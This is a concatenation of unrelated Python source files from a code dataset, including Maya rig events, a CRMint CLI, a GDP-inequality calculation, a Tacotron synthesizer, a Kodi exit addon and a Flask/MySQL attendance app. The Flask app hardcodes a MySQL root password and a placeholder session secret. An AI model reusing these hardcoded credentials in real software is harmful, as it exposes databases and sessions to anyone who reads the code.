\"\"\"\n\n def __init__(self):\n # have maya callbacks been registered?\n self._areMayaCallbacksRegistered = False\n # list of maya callback IDs that have been registered\n self._callbackIDs = []\n # list of objects that are subscribed to any events\n # used to determine if maya callbacks should be registered\n self._subscribers = []\n\n def __del__(self):\n self._unregisterMayaCallbacks()\n\n def _registerMayaCallbacks(self):\n \"\"\"\n Register all Maya callbacks for this dispatcher.\n Does nothing if callbacks are already registered.\n \"\"\"\n if not self._areMayaCallbacksRegistered:\n self._areMayaCallbacksRegistered = True\n self._callbackIDs = list(self._addMayaCallbacks())\n LOG.debug('{0}._registerMayaCallbacks'.format(\n self.__class__.__name__))\n\n def _addMayaCallbacks(self):\n \"\"\"\n Should be overridden in subclasses to register any Maya\n message callbacks. This will only be called if callbacks\n are not already registered.\n\n Returns:\n A list of callback IDs for all newly added callbacks.\n \"\"\"\n return []\n\n def _unregisterMayaCallbacks(self):\n \"\"\"\n Unregister all Maya callbacks, if currently registered.\n \"\"\"\n if self._areMayaCallbacksRegistered:\n self._areMayaCallbacksRegistered = False\n for cbId in self._callbackIDs:\n api.MMessage.removeCallback(cbId)\n self._callbackIDs = []\n LOG.debug('{0}._unregisterMayaCallbacks'.format(\n self.__class__.__name__))\n\n def addSubscriber(self, subscriber):\n \"\"\"\n Add a subscriber to this event dispatcher\n \"\"\"\n if subscriber not in self._subscribers:\n self._subscribers.append(subscriber)\n if self._subscribers:\n self._registerMayaCallbacks()\n\n def removeSubscriber(self, subscriber):\n \"\"\"\n Remove a subscriber from this event dispatcher\n \"\"\"\n if subscriber in self._subscribers:\n self._subscribers.remove(subscriber)\n if not self._subscribers:\n self._unregisterMayaCallbacks()\n\n\nclass RigLifecycleEvents(MayaCallbackEvents):\n \"\"\"\n A singular object responsible for dispatching\n Rig creation and deletion events.\n\n Events:\n onRigCreated(node):\n Called when any rig is created. Passes\n the newly created rig node.\n onRigDeleted(node):\n Called when any rig is deleted. Passes\n the rig node that is being deleted.\n \"\"\"\n\n # the shared events instance\n INSTANCE = None\n\n @classmethod\n def getShared(cls):\n if not cls.INSTANCE:\n cls.INSTANCE = cls()\n return cls.INSTANCE\n\n def __init__(self):\n super(RigLifecycleEvents, self).__init__()\n self.onRigCreated = Event()\n self.onRigDeleted = Event()\n\n # override\n def _addMayaCallbacks(self):\n # rig nodes are always of type 'transform'\n addId = api.MDGMessage.addNodeAddedCallback(\n self._onNodeAdded, 'transform')\n removeId = api.MDGMessage.addNodeRemovedCallback(\n self._onNodeRemoved, 'transform')\n return (addId, removeId)\n\n def _onNodeAdded(self, node, *args):\n \"\"\"\n Args:\n node: A MObject node that was just added\n \"\"\"\n # no way to know if it's a Rig yet,\n # defer until later and check the node again\n # TODO: do this more precisely, don't use deferred\n\n mfn = api.MFnDependencyNode(node)\n if mfn.typeName() != 'transform':\n # rig nodes must be transforms\n return\n\n fullName = api.MFnDagNode(node).fullPathName()\n cmds.evalDeferred(\n partial(self._onNodeAddedDeferred, fullName), evaluateNext=True)\n\n def _onNodeAddedDeferred(self, fullName, *args):\n \"\"\"\n Args:\n fullName: A string full name of a node that was added\n \"\"\"\n node = meta.getMObject(fullName)\n if node:\n if isRig(node):\n LOG.debug(\"onRigCreated('{0}')\".format(node))\n self.onRigCreated(pm.PyNode(node))\n\n def _onNodeRemoved(self, node, *args):\n \"\"\"\n Args:\n node: A MObject node that is being removed\n \"\"\"\n if isRig(node):\n LOG.debug(\"onRigDeleted('{0}')\".format(node))\n self.onRigDeleted(pm.PyNode(node))\n\n\nclass RigEventsMixin(object):\n \"\"\"\n A mixin for listening to shared events related\n to Rig events, such as creation and deletion\n \"\"\"\n\n def enableRigEvents(self):\n \"\"\"\n Enable Rig lifecycle events on this object.\n \"\"\"\n lifeEvents = RigLifecycleEvents.getShared()\n lifeEvents.onRigCreated.appendUnique(self.onRigCreated)\n lifeEvents.onRigDeleted.appendUnique(self.onRigDeleted)\n lifeEvents.addSubscriber(self)\n\n def disableRigEvents(self):\n \"\"\"\n Disable Rig events on this object\n \"\"\"\n lifeEvents = RigLifecycleEvents.getShared()\n lifeEvents.onRigCreated.removeAll(self.onRigCreated)\n lifeEvents.onRigDeleted.removeAll(self.onRigDeleted)\n lifeEvents.removeSubscriber(self)\n\n def onRigCreated(self, node):\n pass\n\n def onRigDeleted(self, node):\n pass\n","sub_path":"src/pulse/scripts/pulse/core/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428797717","text":"# Copyright 2018 Google Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os\nimport sys\n\nPLUGIN_FOLDER = os.path.join(os.path.dirname(__file__), 'commands')\nPROJECT_DIR = os.path.dirname(os.path.dirname(__file__))\nCLI_DIR = os.path.dirname(__file__)\nsys.path.insert(0, PROJECT_DIR)\nsys.path.insert(0, CLI_DIR)\n\nimport click\nfrom cli.utils import shared\nfrom backends.core import insight\n\n\ndef _set_insight_opt_out(config, value):\n config['opt_out'] = value\n with open(insight.INSIGHT_CONF_FILEPATH, 'w+') as fp:\n json.dump(config, fp)\n\n\ndef print_version(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n click.echo(insight.get_crmint_version())\n ctx.exit()\n\n\nclass CRMintCLI(click.MultiCommand):\n \"\"\"App multi command CLI\"\"\"\n\n def _ask_permission(self):\n pkg_name = \"CRMint\"\n msg = click.style(\n \"==========================================================================\",\n fg=\"black\")\n msg += click.style(\n \"\\nWe're constantly looking for ways to make \",\n fg='yellow')\n msg += click.style(pkg_name, fg=\"red\", bold=True)\n msg += click.style(\n \" better! \\nMay we anonymously report usage statistics to improve the tool over time? \\n\"\n \"More info: https://github.com/google/crmint & https://google.github.io/crmint\",\n fg='yellow')\n msg += click.style(\n \"\\n==========================================================================\",\n fg='black')\n if click.confirm(msg, default=True):\n return True\n return False\n\n def list_commands(self, ctx):\n rv = []\n for filename in os.listdir(PLUGIN_FOLDER):\n if not filename.startswith(\"_\") and filename.endswith(\".py\"):\n rv.append(filename[:-3])\n rv.sort()\n return rv\n\n def get_command(self, ctx, name):\n ns = {}\n full_name = os.path.join(PLUGIN_FOLDER, \"%s%s\" % (name, \".py\"))\n with open(full_name) as f:\n code = compile(f.read(), full_name, 'exec')\n eval(code, ns, ns)\n return ns.get('cli', None)\n\n def resolve_command(self, ctx, args):\n self.insight = insight.GAProvider()\n if '--no-insight' in args:\n args.remove('--no-insight')\n _set_insight_opt_out(self.insight.config, True)\n if self.insight.opt_out is None:\n # None means that we still didn't record the user consent.\n self.insight.track('downloaded')\n permission_given = self._ask_permission()\n _set_insight_opt_out(self.insight.config, not permission_given)\n # Reload with the new configuration.\n self.insight = insight.GAProvider()\n self.insight.track('installed')\n self.insight.track(*args)\n return super(CRMintCLI, self).resolve_command(ctx, args)\n\n\n@click.command(cls=CRMintCLI, help='Manage your CRMint instances on GCP or locally.')\n@click.option('--version', is_flag=True, callback=print_version,\n expose_value=False, is_eager=True, help='Print out CRMint version.')\ndef cli():\n pass\n\n\ndef entry_point():\n shared.check_variables()\n cli()\n","sub_path":"cli/appcli.py","file_name":"appcli.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66073176","text":"# -*- coding: utf-8 -*-\n\n'''\nThis code calculates changes in the ratio between different population-weighted GDP deciles and quintiles\n\nby Yixuan Zheng (yxzheng@carnegiescience.edu)\n''' \n\nimport pandas as pd\nimport numpy as np\nfrom netCDF4 import Dataset\nimport _env\n \ndatasets = _env.datasets \nscenarios = _env.scenarios\n \ngdp_year = 2010\nsgdp_year = str(gdp_year)\nidir_temp = _env.odir_root + '/sim_temperature/' \n\n####summarize global and regional GDP changes####\ngdp_year = 2010\nsgdp_year = str(gdp_year)\nboot_methods = ['country-lag0','country-lag1','country-lag5','year','year-blocks']\nitbl_gdp_baseline = pd.read_csv(_env.odir_root + 'basic_stats' + '/Country_Basic_Stats.csv')\n\nitbl_gdp_baseline.sort_values([sgdp_year + '_gdpcap'],inplace=True)\ntot_pop = itbl_gdp_baseline[sgdp_year + '_pop'].sum()\n#itbl_gdp_baseline['2010_pop_ratio'] = itbl_gdp_baseline['2010_pop']/tot_pop\n\nitbl_gdp_baseline[sgdp_year + '_gdpsum'] = 0\n#itbl_gdp_baseline['2010_popw_gdp'] = 0\nitbl_gdp_baseline[sgdp_year + '_popsum'] = 0\n#itbl_gdp_baseline['2010_pop_ratio_sum'] = 0\n\nfor irow, row in enumerate(itbl_gdp_baseline.index):\n if irow == 0:\n itbl_gdp_baseline.loc[row,sgdp_year + '_gdpsum'] = itbl_gdp_baseline.loc[row,sgdp_year + '_gdp']\n itbl_gdp_baseline.loc[row, sgdp_year + '_popsum'] = itbl_gdp_baseline.loc[row,sgdp_year + '_pop']\n \n else:\n itbl_gdp_baseline.loc[row,sgdp_year + '_gdpsum'] = itbl_gdp_baseline[sgdp_year + '_gdpsum'].iloc[irow-1] + itbl_gdp_baseline.loc[row,sgdp_year + '_gdp']\n itbl_gdp_baseline.loc[row, sgdp_year + '_popsum'] = itbl_gdp_baseline[sgdp_year + '_popsum'].iloc[irow-1] + itbl_gdp_baseline.loc[row,sgdp_year + '_pop'] \n \nitbl_gdp_baseline[sgdp_year + '_pop_ratio_sum'] = itbl_gdp_baseline[sgdp_year + '_popsum']/tot_pop\n\n#deciles (<=10% and >=90%)\n\ndeciles = {}\n\nind10 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']<=0.1)[0]\ndeciles[10] = itbl_gdp_baseline.iloc[ind10].copy()\n\n\nind90 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']>=0.9)[0]\ndeciles[90] = itbl_gdp_baseline.iloc[ind90].copy()\n\n\n#quintiles (<=20% and >=80%)\n\nind20 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']<=0.2)[0]\ndeciles[20] = itbl_gdp_baseline.iloc[ind20].copy()\n\nind80 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']>=0.8)[0]\ndeciles[80] = itbl_gdp_baseline.iloc[ind80].copy()\n\n\nfor ds in datasets:\n \n scens = ['No-Aerosol']\n if ds == 'ERA-Interim':\n scens = ['No-Aerosol','No-Sulfate']\n \n idir_gdp = _env.odir_root + '/gdp_' + ds + '/' \n odir_summary = _env.odir_root + '/summary_' + ds + '/' \n _env.mkdirs(odir_summary)\n \n for scen in scens: \n writer = pd.ExcelWriter(odir_summary + 'Deciles_and_Quintile_ratio_changes_'+ds+'_'+scen+'_Burke.xls')\n otbls_ctry_GDP_stat = {}\n \n otbls = {}\n otbl_ineq = pd.DataFrame(index = boot_methods,columns = ['median_ratio','5_ratio','95_ratio','10_ratio','90_ratio','probability_reduced'])\n \n otbls['deciles'] = otbl_ineq.copy()\n otbls['quintiles'] = otbl_ineq.copy()\n \n for b_m in boot_methods:\n \n inc_gdp = Dataset(idir_gdp + 'GDP_Changes_Burke_' + b_m + '_' + str(gdp_year) + '_'+ds+'_'+scen+'.nc')\n imtrx_gdp = inc_gdp['GDP'][:]\n \n dec_var = {}\n dec_base = {}\n \n for perc in [10,20,80,90]:\n dec = deciles[perc].copy()\n dec_pop_tot = dec[sgdp_year + '_pop'].sum()\n dec_gdp_tot = dec[sgdp_year + '_gdp'].sum()\n \n dec_base[perc] = dec_gdp_tot/dec_pop_tot\n ind_ctry = dec.index\n \n imtrx_dec = imtrx_gdp[:,ind_ctry,:]\n imtrx_dec_sum = dec_gdp_tot-(imtrx_dec.data).sum(axis=1) \n# print(perc, np.median(imtrx_dec_sum),dec_gdp_tot,np.median(imtrx_dec_sum)/dec_gdp_tot)\n \n dec_gdpcap = imtrx_dec_sum/dec_pop_tot\n dec_var[perc] = dec_gdpcap.copy()\n \n dec_diff = (dec_var[90]/dec_var[10]-dec_base[90]/dec_base[10])/(dec_base[90]/dec_base[10])*100\n quin_diff = (dec_var[80]/dec_var[20] - dec_base[80]/dec_base[20])/(dec_base[80]/dec_base[20])*100\n \n \n \n otbls['deciles'].loc[b_m,'median_ratio'] = np.median(dec_diff)\n otbls['deciles'].loc[b_m,'5_ratio'] = np.percentile(dec_diff,5)\n otbls['deciles'].loc[b_m,'95_ratio'] = np.percentile(dec_diff,95)\n \n otbls['deciles'].loc[b_m,'10_ratio'] = np.percentile(dec_diff,10)\n otbls['deciles'].loc[b_m,'90_ratio'] = np.percentile(dec_diff,90)\n otbls['deciles'].loc[b_m,'probability_reduced'] = len(dec_diff[dec_diff<0])/np.size(dec_diff)\n \n otbls['quintiles'].loc[b_m,'median_ratio'] = np.median(quin_diff)\n otbls['quintiles'].loc[b_m,'5_ratio'] = np.percentile(quin_diff,5)\n otbls['quintiles'].loc[b_m,'95_ratio'] = np.percentile(quin_diff,95)\n \n otbls['quintiles'].loc[b_m,'10_ratio'] = np.percentile(quin_diff,10)\n otbls['quintiles'].loc[b_m,'90_ratio'] = np.percentile(quin_diff,90)\n otbls['quintiles'].loc[b_m,'probability_reduced'] = len(quin_diff[quin_diff<0])/np.size(quin_diff)\n \n otbls['deciles'].to_excel(writer,'deciles')\n otbls['quintiles'].to_excel(writer,'quintiles')\n \n writer.save()\n\n\n\n \n\n","sub_path":"modules/7.Cal_changes_in_inequality.py","file_name":"7.Cal_changes_in_inequality.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"443841751","text":"#solo calcula dv nit de 9 digitos\n\nnit=input(\"Ingrese nit: \")\n\nmtr1=int(nit[0])*41\nmtr2=int(nit[1])*37\nmtr3=int(nit[2])*29\nmtr4=int(nit[3])*23\nmtr5=int(nit[4])*19\nmtr6=int(nit[5])*17\nmtr7=int(nit[6])*13\nmtr8=int(nit[7])*7\nmtr9=int(nit[8])*3\n\nsuma=mtr1+mtr2+mtr3+mtr4+mtr5+mtr6+mtr7+mtr8+mtr9\n\nmodulo11=suma % 11\nmodulo11m=11-modulo11\nif modulo11 <= 2:\n print(nit,\"-\",modulo11)\nelse:\n print(nit,\"-\",modulo11m)\n\n\n","sub_path":"nit.py","file_name":"nit.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"108459805","text":"import os\nimport numpy as np\nimport tensorflow as tf\nfrom hparams import hparams\n# from tacotron.models import create_model\nfrom tacotron.utils.text import text_to_sequence\nfrom tacotron.utils import plot\nfrom datasets import audio\nfrom tacotron.models.tacotron import Tacotron\n\n\nclass Synthesizer:\n\tdef load(self, checkpoint_path):\n\t\tinputs = tf.placeholder(tf.int32, [1, None], 'inputs')\n\t\tinput_lengths = tf.placeholder(tf.int32, [1], 'input_lengths')\n\n\t\twith tf.variable_scope('model') as scope:\n\t\t\tself.model = Tacotron(hparams)\n\t\t\tself.model.initialize(inputs, input_lengths)\n\t\t\tself.mel_outputs = self.model.mel_outputs\n\t\t\tself.alignment = self.model.alignments[0]\n\n\t\tself.session = tf.Session()\n\t\tself.session.run(tf.global_variables_initializer())\n\t\tsaver = tf.train.Saver()\n\t\tsaver.restore(self.session, checkpoint_path)\n\n\tdef synthesize(self, text, idx, out_dir, mel_filename):\n\t\tcleaner_names = [x.strip() for x in hparams.cleaners.split(',')]\n\t\tseq = text_to_sequence(text, cleaner_names)\n\t\tfeed_dict = {\n\t\t\tself.model.inputs: [np.asarray(seq, dtype=np.int32)],\n\t\t\tself.model.input_lengths: np.asarray([len(seq)], dtype=np.int32),\n\t\t}\n\n\t\tmels, alignment = self.session.run([self.mel_outputs, self.alignment], feed_dict=feed_dict)\n\n\t\tmels = mels.reshape(-1, hparams.num_mels)\n\n\t\twav = audio.inv_mel_spectrogram(mels.T)\n\t\taudio.save_wav(wav, os.path.join(out_dir, 'audio-{:02d}.wav'.format(idx)))\n\n\t\t# save mel spectrogram plot\n\t\tplot.plot_spectrogram(mels, os.path.join(out_dir, 'mel-{:02d}.png'.format(idx)),\n\t\t\t\tinfo='{}'.format(text), split_title=True)\n\n\t\treturn 1\n","sub_path":"tacotron/synthesizer.py","file_name":"synthesizer.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"430880330","text":"import shapely.geometry\nfrom shapely.ops import cascaded_union, unary_union\nimport multiprocessing\nfrom geojson import Feature\n\n\n# 권역정보 로드\ndef apiSample(shapes, groupingDictionary, key):\n clusters = {}\n for shape in shapes:\n cluster_id = groupingDictionary.get(key, None)\n if cluster_id not in clusters:\n clusters[cluster_id] = []\n\n clusters[cluster_id].append(shapely.geometry.shape(shape['geometry']))\n\n\n# 권역 합치기(멀티프로세싱)\ndef multiprocessingUnionClusters(clusters):\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n unionFeatures = pool.map(unionClusterWrapper, clusters.items())\n return unionFeatures\n\n\ndef unionClusters(cluster_id, clusters):\n union_poly = unary_union(clusters)\n return Feature(\n geometry=union_poly, properties={\n \"type\": \"c\",\n \"cluster\": cluster_id,\n }\n )\n\n\ndef unionClusterWrapper(args):\n return unionClusters(*args)","sub_path":"app/util/union.py","file_name":"union.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619585464","text":"import time\nimport xbmc\nimport os\nimport xbmcgui\nimport urllib2\n\nHOME = xbmc.translatePath('special://userdata/')\niddata = os.path.join(HOME, 'networksettings.xml')\n\ndef menuoptions():\n dialog = xbmcgui.Dialog()\n funcs = (\n function1,\n function2\n )\n \n call = dialog.select('[B][COLOR=yellow]CerebroTV[/COLOR][COLOR=red] Exit / Reboot[/COLOR][/B]', [\n '[B][COLOR=green]Run House Keeper and Reboot[/COLOR][/B]',\n '[B][COLOR=green]Exit Kodi[/COLOR][/B]'])\n # dialog.selectreturns\n # 0 -> escape pressed\n # 1 -> first item\n # 2 -> second item\n if call:\n # esc is not pressed\n if call < 0:\n return\n func = funcs[call-2]\n #dp = xbmcgui.DialogProgress()\n #dp.create(\"[COLOR tomato]CerebroTV[/COLOR]\",\"\"+str(func)+\" -3\",\"PLEASE EXIT KODI OR PULL THE POWER LEAD\")\n #xbmc.sleep(1000)\n return func()\n else:\n func = funcs[call]\n #dp = xbmcgui.DialogProgress()\n #dp.create(\"[COLOR tomato]CerebroTV[/COLOR]\",\"\"+str(func)+\" +0\",\"PLEASE EXIT KODI OR PULL THE POWER LEAD\")\n #xbmc.sleep(1000)\n return func()\n return \n\n\ndef function1():\n\n if os.path.exists(iddata):\n with open(iddata, 'r') as mymega:\n userid=mymega.read()\n try: response = urllib2.urlopen('http://megatvbox.co.uk/TV-DATA/auth2.php?id='+str(userid)+'&die=1').read()\n except: pass\n xbmc.executebuiltin('RunAddon(script.program.megatvhousekeeper3)')\n\ndef function2():\n xbmc.executebuiltin(\"Notification(CerebroTV,Closing SPMC/Kodi, Will take a few seconds,7000,)\")\n xbmc.sleep(1000)\n if os.path.exists(iddata):\n with open(iddata, 'r') as mymega:\n userid=mymega.read()\n try: response = urllib2.urlopen('http://megatvbox.co.uk/TV-DATA/auth2.php?id='+str(userid)+'&die=1').read()\n except: pass\n xbmc.executebuiltin('ActivateWindow(10001,\"plugin://plugin.close.kodi/?description&fanart=C%3a%5cUsers%5cbigla%5cAppData%5cRoaming%5cKodi%5caddons%5cplugin.close.kodi%5cfanart.jpg&iconimage=C%3a%5cUsers%5cbigla%5cAppData%5cRoaming%5cKodi%5caddons%5cplugin.close.kodi%5cresources%5cart%5cforce.png&mode=10&name=Close%20System%20(Recommended)&url=fclose\",return)')\n\nmenuoptions()","sub_path":"zips/script.mtvbexit/addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257724421","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\napp.secret_key = 'many random bytes'\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'ghuanying1115'\napp.config['MYSQL_DB'] = 'rfid'\n\nmysql = MySQL(app)\n\n\n@app.route('/')\ndef Index():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM attendance\")\n data = cur.fetchall()\n cur.close()\n\n return render_template('index2.html', attendance=data)\n\n\n@app.route('/insert', methods=['POST', 'GET'])\ndef insert():\n if request.method == \"POST\":\n flash(\"Data Inserted Successfully\")\n id = request.form['id']\n name = request.form['name']\n date = request.form['date']\n time = request.form['time']\n status = request.form['status']\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO attendance (id, name, date, time, status) VALUES (%s, %s, %s, %s, %s)\", (id, name, date, time, status))\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n\n@app.route('/delete/////', methods=['GET'])\ndef delete(id, name, date, time, status):\n flash(\"Record Has Been Deleted Successfully\")\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM attendance WHERE id=%s and name=%s and date=%s and time=%s and status=%s\",\n (id, name, date, time, status))\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n\n@app.route('/update', methods=['POST', 'GET'])\ndef update():\n if request.method == 'POST':\n old_id = request.form['old_id']\n old_name = request.form['old_name']\n old_date = request.form['old_date']\n old_time = request.form['old_time']\n old_status = request.form['old_status']\n new_id = request.form['id']\n new_name = request.form['name']\n new_date = request.form['date']\n new_time = request.form['time']\n new_status = request.form['status']\n cur = mysql.connection.cursor()\n cur.execute(\"\"\"\n UPDATE attendance\n SET id=%s, name=%s, date=%s, time=%s, status=%s\n WHERE id=%s and name=%s and date=%s and time=%s and status=%s\n \"\"\", (new_id, new_name, new_date, new_time, new_status, old_id, old_name, old_date, old_time, old_status))\n flash(\"Data Updated Successfully\")\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n\nif __name__ == \"__main__\":\n app.run(host='192.168.0.166')\n","sub_path":"pythonProject/pythonProject/Attendance Web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175301928","text":"# Patrick Kunst\n# CSC 242\n# hw6.py\n\nfrom web import LinkCollector\nfrom html.parser import HTMLParser\nfrom urllib.request import urlopen\nfrom urllib.parse import urljoin\nfrom urllib.error import URLError\n\nclass ImageCollector(HTMLParser):\n\n def __init__(self, url):\n HTMLParser.__init__(self)\n self.url = url\n self.images = set()\n\n def handle_starttag(self, tag, attrs):\n if tag=='img':\n for attr, val in attrs:\n if attr=='src':\n self.images.add(urljoin(self.url, val))\n\n def getImages(self):\n return self.images\n\nfrom web import Crawler\n\nclass ImageCrawler(Crawler):\n\n def __init__(self):\n Crawler.__init__(self)\n self.img = set()\n\n def crawl(self, url, depth, relativeOnly=True):\n ic = ImageCollector(url)\n try:\n ic.feed(urlopen(url).read().decode())\n except(URLError, UnicodeDecodeError):\n pass\n\n self.img.update(ic.getImages())\n\n Crawler.crawl(self, url, depth, relativeOnly)\n\n \n def getImages(self):\n return self.img\n\n\ndef scrapeImages(url, filename, depth, relativeOnly=True):\n file = open(filename, 'w')\n\n if depth>0:\n ic = ImageCrawler()\n ic.crawl(url, depth, relativeOnly)\n\n for img in ic.getImages():\n file.write('')\n\n scrapeImages(url, filename, depth-1, relativeOnly)\n\n\n\nif __name__=='__main__':\n import doctest\n print(doctest.testfile('hw6TEST.py'))\n \n\n\n\n\n\n\n\n\n \n","sub_path":"hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642732387","text":"# Copyright (c) 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree. An additional grant\n# of patent rights can be found in the PATENTS file in the same directory.\n\nimport torch\nimport torch.nn as nn\nfrom collections import Counter\n\nfrom rlpytorch import Model, ActorCritic\n\nclass MiniRTSNet(Model):\n def __init__(self, args):\n # this is the place where you instantiate all your modules\n # you can later access them using the same names you've given them in here\n super(MiniRTSNet, self).__init__(args)\n self._init(args)\n\n def _init(self, args):\n self.m = args.params[\"num_unit_type\"] + 7\n self.pool = nn.MaxPool2d(2, 2)\n\n # self.arch = \"ccpccp\"\n # self.arch = \"ccccpccccp\"\n if self.args.arch[0] == \"\\\"\" and self.args.arch[-1] == \"\\\"\":\n self.arch = self.args.arch[1:-1]\n else:\n self.arch = self.args.arch\n self.arch, channels = self.arch.split(\";\")\n\n self.num_channels = []\n for v in channels.split(\",\"):\n if v == \"-\":\n self.num_channels.append(self.m)\n else:\n self.num_channels.append(int(v))\n\n self.convs = [ nn.Conv2d(self.num_channels[i], self.num_channels[i+1], 3, padding = 1) for i in range(len(self.num_channels)-1) ]\n for i, conv in enumerate(self.convs):\n setattr(self, \"conv%d\" % (i + 1), conv)\n\n self.relu = nn.ReLU() if self._no_leaky_relu() else nn.LeakyReLU(0.1)\n\n if not self._no_bn():\n self.convs_bn = [ nn.BatchNorm2d(conv.out_channels) for conv in self.convs ]\n for i, conv_bn in enumerate(self.convs_bn):\n setattr(self, \"conv%d_bn\" % (i + 1), conv_bn)\n\n def _no_bn(self):\n return getattr(self.args, \"disable_bn\", False)\n\n def _no_leaky_relu(self):\n return getattr(self.args, \"disable_leaky_relu\", False)\n\n def forward(self, input, res):\n # BN and LeakyReLU are from Wendy's code.\n x = input.view(input.size(0), self.m, 20, 20)\n\n counts = Counter()\n for i in range(len(self.arch)):\n if self.arch[i] == \"c\":\n c = counts[\"c\"]\n x = self.convs[c](x)\n if not self._no_bn(): x = self.convs_bn[c](x)\n x = self.relu(x)\n counts[\"c\"] += 1\n elif self.arch[i] == \"p\":\n x = self.pool(x)\n\n x = x.view(x.size(0), -1)\n return x\n\nclass Model_ActorCritic(Model):\n def __init__(self, args):\n super(Model_ActorCritic, self).__init__(args)\n self._init(args)\n\n def _init(self, args):\n params = args.params\n assert isinstance(params[\"num_action\"], int), \"num_action has to be a number. action = \" + str(params[\"num_action\"])\n self.params = params\n self.net = MiniRTSNet(args)\n\n if self.params.get(\"model_no_spatial\", False):\n self.num_unit = params[\"num_unit_type\"]\n linear_in_dim = (params[\"num_unit_type\"] + 7)\n else:\n linear_in_dim = (params[\"num_unit_type\"] + 7) * 25\n\n self.linear_policy = nn.Linear(linear_in_dim, params[\"num_action\"])\n self.linear_value = nn.Linear(linear_in_dim, 1)\n self.softmax = nn.Softmax()\n\n def get_define_args():\n return [\n (\"arch\", \"ccpccp;-,64,64,64,-\")\n ]\n\n def forward(self, x):\n if self.params.get(\"model_no_spatial\", False):\n # Replace a complicated network with a simple retraction.\n # Input: batchsize, channel, height, width\n xreduced = x[\"s\"].sum(2).sum(3).squeeze()\n xreduced[:, self.num_unit:] /= 20 * 20\n output = self._var(xreduced)\n else:\n s, res = x[\"s\"], x[\"res\"]\n output = self.net(self._var(s), self._var(res))\n\n policy = self.softmax(self.linear_policy(output))\n value = self.linear_value(output)\n return value, dict(V=value, pi=policy)\n\n# Format: key, [model, method]\n# if method is None, fall back to default mapping from key to method\nModels = {\n \"actor_critic\": [Model_ActorCritic, ActorCritic],\n}\n","sub_path":"rts/game_MC/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242643059","text":"# 从excel读入数据存为data\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndata = pd.read_excel('../data/questionnaire2.xlsx', sheet_name=0)\r\n# data = pd.read_excel('../data/all.xlsx', sheet_name=0)\r\nprint(data.head())\r\nprint(len(data.index.values))\r\nprint(len(data.columns.values))\r\n\r\ndata_array = np.array(data)\r\nprint(data_array.shape[0], data_array.shape[1])\r\nprint(data_array[0])\r\n\r\n# 样本的one-hot编码\r\nwith open('../data/q2_pre_data.data', 'w') as all_feature:\r\n for i in range(data_array.shape[0]):\r\n data_line = ''\r\n for j in range(data_array.shape[1]):\r\n value = str(int(data_array[i][j]))\r\n data_line = data_line + value +'\\t'\r\n data_line = data_line+'\\n'\r\n all_feature.write(data_line)\r\n # print(data_line)\r\n\r\n\r\n\r\n\r\n","sub_path":"wordSequence/pretreatment/excel2data.py","file_name":"excel2data.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"530721107","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def maxDepth(self,root):\n if not root:\n return 0\n else:\n return 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))\n\n\ntree = TreeNode([3,9,20,0,0,15,7])\nresult = Solution()\nprint(result.maxDepth(tree))","sub_path":"MaximumDepthofBinaryTree.py","file_name":"MaximumDepthofBinaryTree.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 